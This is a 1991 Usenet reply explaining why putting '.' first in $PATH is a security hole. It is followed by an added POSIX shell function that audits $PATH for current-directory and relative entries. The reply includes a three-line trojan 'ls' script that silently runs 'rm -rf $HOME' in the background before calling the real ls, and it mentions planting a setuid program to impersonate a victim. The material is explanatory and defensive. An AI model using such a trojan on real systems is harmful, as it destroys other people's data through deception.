jik@athena.mit.edu (Jonathan I. Kamens) (02/22/91)
In article <1991Feb22.004010.13359@zip.eecs.umich.edu>, bguthy@amazon.eecs.umich.edu (Bala S. Guthy) writes:
|> Hello, I remember when I first learnt Unix, the instructor said,
|> that "." should never be the first thing in one's $path. It had
|> something to do with a security hole in Unix. Does anyone know
|> what and if there is any disadvantage to having "." as the first
|> entry in $path.

  Because if you cd into a directory in which someone else has placed a trojan horse named the same as a common system utility, and then run that utility, then you're actually running the trojan horse.

  Example: I create a shell script in my home directory called "ls" which does this:

	#!/bin/sh
	nice /bin/sh -c "rm -rf $HOME &"
	exec /bin/ls $*

  You cd into my home directory out of curiosity and type "ls". You're scrod. You might not even notice that your files are disappearing.

  Alternatively, I could make my trojan horse create a program that is setuid to you that I can run at my leisure to become you.

  You get the idea, I hope.

-- 
Jonathan Kamens                         USnail:
MIT Project Athena                      11 Ashford Terrace
jik@Athena.MIT.EDU                      Allston, MA 02134
Office: 617-253-8085                    Home: 617-782-0710
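
A check for the situation described in this post, added here as an example and not part of the original article: a POSIX sh function (the name audit_path is made up for this example) that flags every $PATH entry resolved against the current directory. It goes beyond the literal "." case by also flagging empty entries (a leading, trailing or doubled colon), which the shell searches as the current directory, and any other relative entry.

```shell
#!/bin/sh
# Usage: audit_path "$PATH"
# Prints one line for every entry that makes command lookup depend on the
# directory you happen to be in; returns 1 if any was found, else 0.
audit_path() {
    ap_rest="$1:"      # trailing colon lets the loop see a final empty entry
    ap_pos=0
    ap_bad=0
    while [ -n "$ap_rest" ]; do
        ap_entry=${ap_rest%%:*}     # text before the first colon
        ap_rest=${ap_rest#*:}       # everything after that colon
        ap_pos=$((ap_pos + 1))
        case $ap_entry in
            "")
                echo "entry $ap_pos: empty entry, searched as the current directory"
                ap_bad=1 ;;
            .)
                echo "entry $ap_pos: '.' is the current directory"
                ap_bad=1 ;;
            /*)
                ;;                  # absolute path: unaffected by cd
            *)
                echo "entry $ap_pos: '$ap_entry' is relative to the current directory"
                ap_bad=1 ;;
        esac
    done
    return "$ap_bad"
}
```

The entry numbers in the output count from 1 in search order, so a low number means the risky entry is consulted before the system directories that follow it.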